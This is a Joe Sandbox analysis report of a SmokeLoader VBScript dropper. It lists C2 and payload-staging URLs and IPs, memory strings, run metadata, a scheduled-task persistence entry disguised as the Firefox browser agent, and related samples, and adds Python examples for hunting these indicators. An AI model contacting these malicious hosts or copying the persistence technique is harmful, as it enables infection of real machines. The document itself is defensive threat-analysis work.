            sweetnessgoodforgreatnessthingswithgood.tIF.vbs | 16% | ReversingLabs | Win32.Trojan.Generic |
            sweetnessgoodforgreatnessthingswithgood.tIF.vbs | 13% | Virustotal | | Browse

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\uahuajd | 0% | ReversingLabs | |

            No Antivirus matches

            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            https://www.pollensense.com/ | 0% | Avira URL Cloud | safe |
            http://prolinice.ga/ndex.php | 0% | Avira URL Cloud | safe |
            http://prolinice.ga/index.php | 100% | Avira URL Cloud | malware |
            http://vilendar.ga/index.php | 100% | Avira URL Cloud | malware |
            http://prolinice.ga/ | 0% | Avira URL Cloud | safe |
            http://prolinice.ga/O | 0% | Avira URL Cloud | safe |
            http://www.foreca.com | 0% | Avira URL Cloud | safe |
            http://192.3.27.144/250/evenmegoodfor.txt | 100% | Avira URL Cloud | malware |
            http://prolinice.ga/index.phpMozilla/5.0 | 0% | Avira URL Cloud | safe |
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            prolinice.ga | 46.173.214.14 | true | true | | unknown
            res.cloudinary.com | unknown | unknown | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            http://prolinice.ga/index.php | true | Avira URL Cloud: malware | unknown
            http://vilendar.ga/index.php | true | Avira URL Cloud: malware | unknown
            http://192.3.27.144/250/evenmegoodfor.txt | false | Avira URL Cloud: malware | unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                    high
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://prolinice.ga/ndex.phpexplorer.exe, 0000000E.00000002.1757266577.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                        high
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://www.pollensense.com/explorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000000C.00000000.1504447706.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                      high
                                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://excel.office.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.microexplorer.exe, 0000000C.00000000.1506335410.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506356157.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1505560118.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                high
                                                https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000000.00000003.1223863747.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1224054764.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226918992.00000148B15AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227341104.00000148B3441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223724844.00000148B3378000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223795021.00000148B3341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227807236.00000148B3551000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbsfalse
                                                  high
                                                  https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                          high
                                                          https://res.cloudinary.com/powershell.exe, 00000002.00000002.1452333990.000001478891E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://wns.windows.com/explorer.exe, 0000000C.00000000.1506729663.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/koswald/VBScriptsweetnessgoodforgreatnessthingswithgood.tIF.vbsfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000C.00000000.1509467961.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.1765549035.000000000C44D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://word.office.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                            high
                                                                            https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://prolinice.ga/explorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                        high
                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://powerpoint.office.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.foreca.comexplorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.ecosia.org/newtab/explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                                high
                                                                                                https://outlook.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://prolinice.ga/Oexplorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                                      high
                                                                                                      https://res.cloudinary.compowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgXpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbsfalse
                                                                                                            high
                                                                                                            https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgpowershell.exe, 00000002.00000002.1453088771.0000014788B45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000000.1506729663.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
String (URL) found in memory / dropped files
  http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
    found in: explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp
    malicious: false    AV: Avira URL Cloud: safe    reputation: unknown
  https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
    found in: explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmp
    malicious: false    reputation: high
  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
    found in: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp
    malicious: false    reputation: high
  https://api.msn.com/
    found in: explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmp
    malicious: false    reputation: high
  https://aka.ms/pscore68
    found in: powershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmp
    malicious: false    reputation: high
  http://prolinice.ga/index.phpMozilla/5.0
    found in: explorer.exe, 0000000E.00000002.1757266577.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1730709154.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1746568361.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2525393447.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.1941068248.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2524671592.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2524396685.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2524911167.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2524250168.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
    malicious: false    AV: Avira URL Cloud: safe    reputation: unknown
  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    found in: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.dr
    malicious: false    reputation: high
  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    found in: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp
    malicious: false    reputation: high
  https://www.msn.com:443/en-us/feed
    found in: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp
    malicious: false    reputation: high
  https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
    found in: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmp
    malicious: false    reputation: high
IP              Domain         Country              ASN    ASN name                   Malicious
46.173.214.14   prolinice.ga   Russian Federation   47196  GARANT-PARK-INTERNET, RU   true
192.3.27.144    unknown        United States        36352  AS-COLOCROSSING, US        false
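The two tables above, together with the "C2 URLs / IPs found in malware configuration" signature, give the network indicators for this sample: prolinice.ga / 46.173.214.14 is the SmokeLoader C2 (marked malicious), while 192.3.27.144 appears only as the host of the .hta and .txt stages in the related-sample context further down. Note that the memory-string table rates the prolinice.ga URLs "malicious: false / Avira URL Cloud: safe"; that is a URL-reputation lookup, not a verdict on the domain, and should not be used to discount the C2. The following is an added example, not part of the Joe Sandbox report, that matches constructed proxy log lines against these indicators. The log format, the client addresses and the "bare Mozilla/5.0 User-Agent POSTing to /index.php" beacon heuristic (read from the adjacent memory strings index.php, application/x-www-form-urlencoded and Mozilla/5.0) are assumptions of the example, not signatures shipped with the report.

```python
"""Match proxy log lines against the network indicators from this report."""
import ipaddress
import re
from dataclasses import dataclass, field

# Indicators taken from the report tables. The role labels are this example's own
# reading of those tables (assumption): prolinice.ga/index.php is the configured C2;
# 192.3.27.144 only hosts the .hta/.txt stages in the related-sample context.
C2_DOMAINS = {"prolinice.ga"}
C2_IPS = {"46.173.214.14"}
STAGING_IPS = {"192.3.27.144"}

# Beacon-shape heuristic built from the adjacent memory strings "index.php",
# "application/x-www-form-urlencoded" and "Mozilla/5.0": a POST to /index.php with a
# bare "Mozilla/5.0" User-Agent. Assumption of this example, not a report signature.
BEACON_PATH = "/index.php"
BARE_UA = "Mozilla/5.0"

# Constructed proxy log format (not from the report):
#   <ts> <client> <method> <url> <status> <bytes> "<user-agent>" "<content-type>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<ua>[^"]*)" "(?P<ctype>[^"]*)"$'
)
URL_RE = re.compile(r'^(?P<scheme>https?)://(?P<host>[^/:]+)(?::\d+)?(?P<path>/[^ ?]*)?')


@dataclass
class Hit:
    client: str
    host: str
    reasons: list = field(default_factory=list)


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(line):
    """Return a Hit for one log line, or None when it matches no indicator."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    u = URL_RE.match(m["url"])
    if not u:
        return None
    host = u["host"].lower()
    path = u["path"] or "/"
    reasons = []
    if host in C2_DOMAINS or host in C2_IPS:
        reasons.append("c2 host")
    elif host in STAGING_IPS:
        reasons.append("staging host")
    if m["method"] == "POST" and path == BEACON_PATH and m["ua"] == BARE_UA:
        reasons.append("beacon shape: POST index.php with bare Mozilla/5.0 UA")
    # Plain HTTP to a bare IP with a bare UA is worth a look even when the IP is unknown.
    if not reasons and _is_ip(host) and u["scheme"] == "http" and m["ua"] == BARE_UA:
        reasons.append("bare UA to bare IP")
    return Hit(m["client"], host, reasons) if reasons else None


def scan(lines):
    """Classify every line and keep the ones that produced a Hit."""
    return [h for h in (classify(l) for l in lines) if h]


# Constructed sample log lines so the example runs offline; 10.0.0.x clients and
# 203.0.113.9 are made up, the other hosts come from the report.
SAMPLE_LOG = """\
2025-01-09T08:02:10Z 10.0.0.15 GET http://192.3.27.144/250/evenmegoodfor.txt 200 4132 "Mozilla/5.0" ""
2025-01-09T08:02:41Z 10.0.0.15 POST http://prolinice.ga/index.php 200 512 "Mozilla/5.0" "application/x-www-form-urlencoded"
2025-01-09T08:03:00Z 10.0.0.22 GET https://www.msn.com/en-us/feed 200 90210 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/117.0" ""
2025-01-09T08:03:05Z 10.0.0.15 POST http://46.173.214.14/index.php 200 512 "Mozilla/5.0" "application/x-www-form-urlencoded"
2025-01-09T08:03:09Z 10.0.0.31 GET http://203.0.113.9/update.bin 200 7000 "Mozilla/5.0" ""
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f"{hit.client} -> {hit.host}: {'; '.join(hit.reasons)}")
```

The msn.com line is there to show that a full browser User-Agent does not trip the beacon heuristic; the last line shows the weaker "bare UA to bare IP" rule firing on an address that is not in the report, which is the rule to tune (or drop) for a noisy environment.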
                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                Analysis ID:1586466
                                                                                                                                Start date and time:2025-01-09 08:01:06 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 6m 55s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:30
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:1
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:sweetnessgoodforgreatnessthingswithgood.tIF.vbs
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.bank.troj.spyw.expl.evad.winVBS@27/21@2/2
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 90.9%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 97%
                                                                                                                                • Number of executed functions: 117
                                                                                                                                • Number of non-executed functions: 86
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .vbs
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.17.201.1, 104.17.202.1, 20.189.173.21, 13.107.246.45, 20.109.210.53, 20.190.160.20
                                                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, resc.cloudinary.com.cdn.cloudflare.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target uahuajd, PID 1652 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
02:01:58  API Interceptor  47x Sleep call for process: powershell.exe modified
03:21:30  API Interceptor  141366x Sleep call for process: explorer.exe modified
03:22:11  API Interceptor  1x Sleep call for process: WerFault.exe modified
09:21:48  Task Scheduler   Run new task: Firefox Default Browser Agent 0757462E3259C930 path: C:\Users\user\AppData\Roaming\uahuajd
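The Task Scheduler entry at 09:21:48 is the persistence mechanism: a task named like Firefox's own "Firefox Default Browser Agent <16 hex digits>" task, whose action is the dropped file C:\Users\user\AppData\Roaming\uahuajd, an extensionless binary in a user-writable directory. The following is an added example, not part of the report, of a hunt over scheduled-task records for that pattern. The task records are constructed, and the location of the legitimate agent (default-browser-agent.exe inside the Firefox install directory) is an assumption of the example.

```python
"""Hunt scheduled-task records for the persistence pattern recorded in the timeline above."""
import re
from pathlib import PureWindowsPath

# Firefox's own task is named "Firefox Default Browser Agent <16 hex digits>" and runs
# default-browser-agent.exe from the Firefox install directory (assumption of this example).
FIREFOX_TASK_RE = re.compile(r"^Firefox Default Browser Agent [0-9A-F]{16}$", re.IGNORECASE)
LEGIT_AGENT_EXE = "default-browser-agent.exe"
LEGIT_AGENT_DIRS = ("program files\\mozilla firefox", "program files (x86)\\mozilla firefox")

# Per-user writable directories; a task action living here is unusual for system software.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\", "\\users\\public\\")


def check_task(name, action):
    """Return the findings for one task. `action` is the executable path only (no arguments)."""
    exe = PureWindowsPath(action.strip().strip('"'))
    full = str(exe).lower()
    parent = str(exe.parent).lower()
    findings = []
    if FIREFOX_TASK_RE.match(name):
        looks_legit = exe.name.lower() == LEGIT_AGENT_EXE and any(
            parent.endswith(d) for d in LEGIT_AGENT_DIRS
        )
        if not looks_legit:
            findings.append("Firefox-agent task name but action is not the Firefox agent binary")
    if any(w in full for w in USER_WRITABLE):
        findings.append("action lives in a user-writable directory")
    if exe.suffix == "":
        findings.append("action has no file extension")
    return findings


def hunt(tasks):
    """Map task name -> findings for every task that produced at least one finding."""
    out = {}
    for name, action in tasks:
        found = check_task(name, action)
        if found:
            out[name] = found
    return out


# Constructed task records (name, action); the second one mirrors the report's timeline entry.
SAMPLE_TASKS = [
    ("Firefox Default Browser Agent 308046B0AF4A39CB",
     r"C:\Program Files\Mozilla Firefox\default-browser-agent.exe"),
    ("Firefox Default Browser Agent 0757462E3259C930",
     r"C:\Users\user\AppData\Roaming\uahuajd"),
    ("MicrosoftEdgeUpdateTaskMachineCore",
     r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"),
    ("OneDrive Standalone Update Task-S-1-5-21-1",
     r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"),
]

if __name__ == "__main__":
    for task_name, findings in hunt(SAMPLE_TASKS).items():
        print(task_name)
        for finding in findings:
            print("  -", finding)
```

On a live host the records can come from `schtasks /query /v /fo csv` (TaskName and "Task To Run" columns, with arguments stripped) before being fed to `hunt`. The user-writable rule is noisy on its own, as the OneDrive updater in the sample shows, so treat the number of findings per task as a triage score rather than a verdict; the name-impersonation and no-extension findings together are the ones that single out the report's task.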
Match (IP)       Associated sample name / URL                           Detection   Threat name                  Context
46.173.214.14    begoodforeverythinggreatthingsformebetterforgood.hta   malicious   Cobalt Strike, SmokeLoader   prolinice.ga/index.php
192.3.27.144     begoodforeverythinggreatthingsformebetterforgood.hta   malicious   Cobalt Strike, SmokeLoader   192.3.27.144/250/evenmegoodfor.txt
                 PO#3311-20250108003.xls                                malicious   Unknown                      192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                 PO#3311-20250108003.xls                                malicious   Unknown                      192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                 PO#3311-20250108003.xls                                malicious   Unknown                      192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
Match (domain)   Associated sample name / URL                                                                       Detection   Threat name                               Context
prolinice.ga     begoodforeverythinggreatthingsformebetterforgood.hta                                               malicious   Cobalt Strike, SmokeLoader                46.173.214.14
                 bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta                            malicious   Cobalt Strike, HTMLPhisher, SmokeLoader   46.173.214.24
                 #U3010TW-S PO#U3011PO#3311-20241118003.xls                                                         malicious   HTMLPhisher, SmokeLoader                  46.173.214.24
                 veryeasythingsevermadeforcreatenewthignsbetterthigns.hta                                           malicious   Cobalt Strike, SmokeLoader                45.91.8.152
                 SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf                                         malicious   SmokeLoader                               185.251.91.119
                 40830001.xls                                                                                       malicious   SmokeLoader                               185.251.91.119
                 #20240627_Edlen_B.xls                                                                              malicious   SmokeLoader                               77.232.129.190
                 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe   malicious   SmokeLoader                               77.232.129.190
                 #20240627_Edlen_A.xls                                                                              malicious   SmokeLoader                               77.232.129.190
Match (ASN)                Associated sample name / URL                                               Detection   Threat name                               Context
GARANT-PARK-INTERNET, RU   begoodforeverythinggreatthingsformebetterforgood.hta                       malicious   Cobalt Strike, SmokeLoader                46.173.214.14
                           Set-up.exe                                                                 malicious   Clipboard Hijacker, Cryptbot              46.173.214.195
                           bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta    malicious   Cobalt Strike, HTMLPhisher, SmokeLoader   46.173.214.24
                           #U3010TW-S PO#U3011PO#3311-20241118003.xls                                 malicious   HTMLPhisher, SmokeLoader                  46.173.214.24
                           0HUxKfIvSV.exe                                                             malicious   Clipboard Hijacker                        46.173.214.92
                           0HUxKfIvSV.exe                                                             malicious   Clipboard Hijacker                        46.173.214.92
                           9xNI7vE1XO.exe                                                             malicious   Clipboard Hijacker                        46.173.214.92
                           9xNI7vE1XO.exe                                                             malicious   Clipboard Hijacker                        46.173.214.92
                           bacon.exe                                                                  malicious   CobaltStrike                              46.173.214.102
                           UfRKIdsNvD.exe                                                             malicious   Clipboard Hijacker                        46.173.214.92
AS-COLOCROSSING, US        begoodforeverythinggreatthingsformebetterforgood.hta                       malicious   Cobalt Strike, SmokeLoader                192.3.27.144
                           PO#3311-20250108003.xls                                                    malicious   Unknown                                   192.3.27.144
                           PO#3311-20250108003.xls                                                    malicious   Unknown                                   192.3.27.144
                           PO#3311-20250108003.xls                                                    malicious   Unknown                                   192.3.27.144
                           miori.ppc.elf                                                              malicious   Unknown                                   192.210.142.114
                           9876567899.bat.exe                                                         malicious   Lokibot                                   172.245.123.11
                           arm5.elf                                                                   malicious   Unknown                                   104.168.33.8
